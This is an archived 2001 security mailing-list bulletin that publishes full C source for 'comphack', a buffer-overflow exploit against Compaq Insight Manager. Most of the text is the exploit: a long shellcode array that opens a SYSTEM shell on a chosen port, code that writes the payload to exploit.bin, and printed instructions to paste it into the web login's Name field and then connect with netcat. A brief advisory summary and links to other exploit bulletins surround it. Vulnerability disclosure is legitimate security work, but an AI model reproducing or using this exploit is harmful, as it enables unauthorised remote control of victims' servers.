[EXPL] Compaq Insight Manager Remote SYSTEM Shell (Exploit)

From: support@securiteam.com
Date: 12/01/01

Previous message: support@securiteam.com: "[UNIX] UUCP Command Line Arguments Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Compaq Insight Manager Remote SYSTEM Shell (Exploit)
Message-Id: <20011201154715.C06E8138BF@mail.der-keiler.de>
Date: Sat,  1 Dec 2001 16:47:15 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

Compaq Insight Manager Remote SYSTEM Shell (Exploit)
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article:
<http://www.securiteam.com/securitynews/5SP0V005FW.html> Compaq
Web-Enabled Management Software Security Vulnerability, a security
vulnerability in the product allows attackers to cause a buffer overflow
in the program causing it to execute arbitrary code. This would allow an
attacker to gain access to the system without requiring a valid username
or password.

An exploit code has now been released to demonstrate this vulnerability.

DETAILS

Exploit:
/* comphack.c - Compaq Insight Manager overflow exploit by Indigo
<indig0@talk21.com> 2001
Usage: comphack <victim port>

This code has been compiled and tested on Linux and Win32
The shellcode spawns a SYSTEM shell on the chosen port

Main shellcode adapted from code written by izan@deepzone.org

Greets to:

Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting
D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on Win32 */
#include <stdio.h>

int main(int argc, char **argv)
{

unsigned char shellcode[] =

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";

FILE *fp;
unsigned short int a_port;

printf ("\nCompaq Insight Manager overflow
launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
printf ("This program will generate a binary file called
exploit.bin\n");
printf ("Connect to the victim using a web browser
http://victim:2301\n";);
printf ("Next to \'Login Account\', click on \'anonymous\'\n");
printf ("Enter some random characters into the \'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then copy to the
clipboard\n");
printf ("Paste the exploit into the \'Name\' field and click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

if (argc != 2)
{
printf ("Usage: %s <victim port>\n", argv[0]);
exit (0);
}

a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;

shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");

fputs (shellcode,fp);

fclose (fp);

return 0;

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:indig0@talk21.com> Indigo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Previous message: support@securiteam.com: "[UNIX] UUCP Command Line Arguments Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

comphack - Compaq Insight Manager Remote SYSTEM shell
... comphack - Compaq Insight Manager Remote SYSTEM shell ... I'm running out of Win32 vulnerabilities to exploit ... printf ("This program will generate a binary file called ...
(Bugtraq)
[EXPL] PoPToP PPTP Server Remote Exploit Code Released
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct pptp_header { ... int i, buflen = 500; ... printf(" D A A S ...
(Securiteam)
[EXPL] IIS Server Side Include Buffer Overflow (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft IIS ... ssinc.dll Buffer Overflow Vulnerability, ... printf; ...
(Securiteam)
[EXPL] Firewall-1 Remote SYSTEM Shell Buffer Overflow
... Firewall-1 Remote SYSTEM Shell Buffer Overflow ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... printf ("To perform this exploit you must attack from a valid GUI client ... printf ("Paste it into the User Name field of the GUI log viewer then ...
(Securiteam)
[EXPL] Multiple Exploit Codes for Apache Chunked Buffer Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int i, j, lport; ... struct sockaddr_in sin, from; ... printf(" -o char\t\tDefault values for the following OSes\n"); ...
(Securiteam)